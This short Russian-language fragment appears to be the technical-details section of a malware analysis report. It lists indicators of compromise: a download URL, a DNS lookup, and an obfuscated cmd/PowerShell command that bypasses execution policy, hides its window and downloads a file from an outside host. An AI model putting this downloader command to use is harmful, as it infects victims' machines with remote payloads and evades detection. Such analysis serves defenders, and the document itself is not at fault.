Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POW^Ershel^L.eXe -EXe^C^u^Ti^ON^PoLICY^ b^yp^A^s^S -N^oP^R^OfIl^E^ -^WiNdO^w^s^TYLe ^H^idDen ^(NEw^-O^BjE^C^T SY^sT^E^m^.nET^.W^Eb^cliE^nT).downl^O^aDFiLe('http://newyeargoka.top/...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /c "POW^Ershel^L.eXe -EXe^C^u^Ti^ON^PoLICY^ b^yp^A^s^S -N^oP^R^OfIl^E^ -^WiNdO^w^s^TYLe ^H^idDen ^(NEw^-O^BjE^C^T SY^sT^E^m^.nET^.W^Eb^cliE^nT).downl^O^aDFiLe('http://newyeargoka.top/...' (со скрытым окном)